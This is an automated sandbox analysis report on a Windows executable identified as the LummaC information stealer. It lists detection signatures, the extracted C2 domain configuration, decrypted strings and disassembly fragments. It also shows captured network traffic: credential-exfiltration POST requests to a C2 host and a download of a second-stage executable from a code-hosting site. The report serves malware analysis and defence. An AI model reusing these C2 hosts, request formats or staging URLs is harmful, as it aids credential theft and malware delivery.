Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fnCae9FQhg.exe

Overview

General Information

Sample name:fnCae9FQhg.exe
renamed because original name is a hash value
Original sample name:f52f8ec2cddc2977f7f74fcfdf87d35f.exe
Analysis ID:1580353
MD5:f52f8ec2cddc2977f7f74fcfdf87d35f
SHA1:f9b514d83e0151d96bd0cae36a3271667cd7282b
SHA256:f6e61e5caac73a84ad8840618fc8808ab4a55628a1ae8dbddcf8814ae748096a
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • fnCae9FQhg.exe (PID: 404 cmdline: "C:\Users\user\Desktop\fnCae9FQhg.exe" MD5: F52F8EC2CDDC2977F7F74FCFDF87D35F)
    • WerFault.exe (PID: 5504 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 404 -s 2028 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["shapestickyr.lat", "tentabatte.lat", "slipperyloo.lat", "curverpluch.lat", "talkynicer.lat", "bashfulacid.lat", "observerfry.lat", "manyrestro.lat", "wordyfindy.lat"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: fnCae9FQhg.exe PID: 404JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: fnCae9FQhg.exe PID: 404JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: fnCae9FQhg.exe PID: 404JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            Process Memory Space: fnCae9FQhg.exe PID: 404JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T11:22:15.764205+010020283713Unknown Traffic192.168.2.649713104.21.36.201443TCP
                2024-12-24T11:22:17.763090+010020283713Unknown Traffic192.168.2.649715104.21.36.201443TCP
                2024-12-24T11:22:20.679767+010020283713Unknown Traffic192.168.2.649721104.21.36.201443TCP
                2024-12-24T11:22:23.057783+010020283713Unknown Traffic192.168.2.649728104.21.36.201443TCP
                2024-12-24T11:22:25.786477+010020283713Unknown Traffic192.168.2.649739104.21.36.201443TCP
                2024-12-24T11:22:28.785092+010020283713Unknown Traffic192.168.2.649745104.21.36.201443TCP
                2024-12-24T11:22:31.182861+010020283713Unknown Traffic192.168.2.649752104.21.36.201443TCP
                2024-12-24T11:22:36.142637+010020283713Unknown Traffic192.168.2.649766104.21.36.201443TCP
                2024-12-24T11:22:38.725809+010020283713Unknown Traffic192.168.2.649773185.166.143.48443TCP
                2024-12-24T11:22:41.110802+010020283713Unknown Traffic192.168.2.64978416.182.108.137443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T11:22:16.534676+010020546531A Network Trojan was detected192.168.2.649713104.21.36.201443TCP
                2024-12-24T11:22:18.546479+010020546531A Network Trojan was detected192.168.2.649715104.21.36.201443TCP
                2024-12-24T11:22:36.779245+010020546531A Network Trojan was detected192.168.2.649766104.21.36.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T11:22:16.534676+010020498361A Network Trojan was detected192.168.2.649713104.21.36.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T11:22:18.546479+010020498121A Network Trojan was detected192.168.2.649715104.21.36.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T11:22:21.742397+010020480941Malware Command and Control Activity Detected192.168.2.649721104.21.36.201443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: fnCae9FQhg.exeAvira: detected
                Found malware configuration
                Source: fnCae9FQhg.exe.404.1.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["shapestickyr.lat", "tentabatte.lat", "slipperyloo.lat", "curverpluch.lat", "talkynicer.lat", "bashfulacid.lat", "observerfry.lat", "manyrestro.lat", "wordyfindy.lat"], "Build id": "LOGS11--LiveTraffic"}
                Multi AV Scanner detection for submitted file
                Source: fnCae9FQhg.exeReversingLabs: Detection: 47%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: fnCae9FQhg.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: bashfulacid.lat
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: tentabatte.lat
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: curverpluch.lat
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: talkynicer.lat
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: shapestickyr.lat
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: manyrestro.lat
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: slipperyloo.lat
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: wordyfindy.lat
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: observerfry.lat
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: LOGS11--LiveTraffic
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D58D5 CryptUnprotectData,1_2_009D58D5
                Source: fnCae9FQhg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49745 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49766 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.6:49773 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 16.182.108.137:443 -> 192.168.2.6:49784 version: TLS 1.2
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov word ptr [eax], cx1_2_009E1A10
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]1_2_009E3B50
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov byte ptr [ebx], al1_2_009ED34A
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h1_2_00A00340
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov eax, ebx1_2_009E7440
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]1_2_009E7440
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov edi, dword ptr [esi+30h]1_2_009CCC7A
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]1_2_00A00D20
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov edx, ebx1_2_009C8600
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov ecx, eax1_2_009E2E6D
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then jmp edx1_2_009E2E6D
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]1_2_009E2E6D
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]1_2_00A01720
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov byte ptr [ebx], al1_2_009EC09E
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov ecx, eax1_2_009DD8AC
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov ecx, eax1_2_009DD8AC
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov eax, ebx1_2_009DC8A0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]1_2_009DC8A0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah]1_2_009DC8A0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh]1_2_009DC8A0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov byte ptr [ebx], al1_2_009EE0DA
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov ecx, eax1_2_009DD8D8
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov ecx, eax1_2_009DD8D8
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov esi, ecx1_2_009E90D0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov edx, ecx1_2_009DB8F6
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov edx, ecx1_2_009DB8F6
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov byte ptr [ebx], al1_2_009EC0E6
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then push esi1_2_009CC805
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h1_2_009E2830
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]1_2_009FC830
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov byte ptr [edi], al1_2_009EC850
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h1_2_009FC990
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov byte ptr [edi], al1_2_009EB980
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then jmp edx1_2_009E39B9
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]1_2_009E39B9
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h1_2_009E81CC
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h1_2_009E89E9
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov ecx, eax1_2_009ED116
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov byte ptr [ebx], al1_2_009EC09E
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h]1_2_00A01160
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov ecx, eax1_2_009ED17D
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h1_2_009EB170
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov eax, dword ptr [00A06130h]1_2_009D8169
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_009EAAC0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_009F6210
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then lea esi, dword ptr [eax+00000270h]1_2_009C8A50
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h1_2_009FCA40
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh]1_2_009DEB80
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h1_2_009E83D8
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]1_2_009C73D0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]1_2_009C73D0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov edx, ecx1_2_009D8B1B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov ecx, eax1_2_009DC300
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]1_2_009CAB40
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h1_2_009D4CA0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov word ptr [eax], cx1_2_009D747D
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov word ptr [edx], di1_2_009D747D
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]1_2_009EC465
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov byte ptr [ebx], al1_2_009EC465
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov edi, ecx1_2_009EA5B6
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax-46h]1_2_009FEDC1
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov byte ptr [ebx], al1_2_009EDDFF
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh1_2_009FCDF0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh]1_2_009FCDF0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh1_2_009FCDF0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h1_2_009FCDF0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov edx, ecx1_2_009E6D2E
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h1_2_009E8528
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+61765397h]1_2_009DB57D
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then dec edx1_2_009FFD70
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov edx, ecx1_2_009E9E80
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]1_2_00A006F0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov byte ptr [ebx], al1_2_009EDE07
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then dec edx1_2_009FFE00
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov dword ptr [esp+20h], eax1_2_009C9780
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then jmp edx1_2_009E37D6
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov edi, dword ptr [esp+28h]1_2_009E5F1B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov ecx, eax1_2_009EBF13
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then jmp eax1_2_009E9739
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then mov word ptr [eax], cx1_2_009D6F52
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]1_2_009E7740

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49715 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49715 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49713 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49713 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49721 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49766 -> 104.21.36.201:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: shapestickyr.lat
                Source: Malware configuration extractorURLs: tentabatte.lat
                Source: Malware configuration extractorURLs: slipperyloo.lat
                Source: Malware configuration extractorURLs: curverpluch.lat
                Source: Malware configuration extractorURLs: talkynicer.lat
                Source: Malware configuration extractorURLs: bashfulacid.lat
                Source: Malware configuration extractorURLs: observerfry.lat
                Source: Malware configuration extractorURLs: manyrestro.lat
                Source: Malware configuration extractorURLs: wordyfindy.lat
                Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
                Source: Joe Sandbox ViewIP Address: 104.21.36.201 104.21.36.201
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49715 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49739 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49728 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49721 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49745 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49752 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49766 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49784 -> 16.182.108.137:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49773 -> 185.166.143.48:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AK1OA31E9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12811Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=E8YHW9WJ7TL56BAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15093Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=481B5SIFX1Y4XKAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19951Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UNL82YRDMF7E0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1206Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JZV35BLGTBG5B66User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572528Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: observerfry.lat
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJTP5QYLD&Signature=0gsyNjuf756Vq6K0RZV6Vi%2FWImU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECMaCXVzLWVhc3QtMSJGMEQCIHqj26tV65D%2FvAw%2Bywel8AEAJF9JoNqhKOwprvxw9mEDAiAQk%2BzsgC5YLtSZ8mAOhSrQ5EbP1nlfHG9kQ3PezQ3lyiqwAgjr%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMkMl%2BRFEwMu0%2FzGyXKoQC2a%2FHBSul83NQ8p8t4txxanRAkeBJUdiNx6lf7uqSqP8BZIcvUc4n4ENPpmvQTTAo0O3VURV0yP9IvWqw0DnRXdzjKwUXK6q3TWovFckZLyzZOouJiEgWlAWVLNyQT02RcFEWT587G0QoXUTx1Lz4Of7hNeh6k9Ne92Y3iToJcaZJ6w2XyEDHnwEb9%2Fd5oPOV8NOH1SE0e0A4r%2FJyHUHEyILhq%2FoP6G28RcqDqxCuvgqOqnyGdQNmRsMK5HdHjjv2qAhhfY15lHUk5IFAPV43RovV0YK1G0h%2BsF6TaGbErDm4D016g54EiCmw49k%2BC5HSNeGcM%2BkT%2FDIgX0GK5IWQnYh6VugwipCquwY6ngFs24wzlDwNBHDL67C%2FwjBEnksCoFhSTvCORCtiVaOPIzzOlrGmKSU3Or5N2V18%2Fq20tIXooICKu8P4J2I4rdz2f%2FJD7Dq%2BF00i4OW%2FxQJ6LqwaPMAIX%2BQcsPV%2FFwo5WAIfoy4W9ygeWg5MqgxcHVu2NP6C0NWOAsSPP7l0qE173HnB8MnL9e%2BJ20gyBJBLs4rwHZCoPdcAVgc%2FS9V3Jg%3D%3D&Expires=1735036690 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 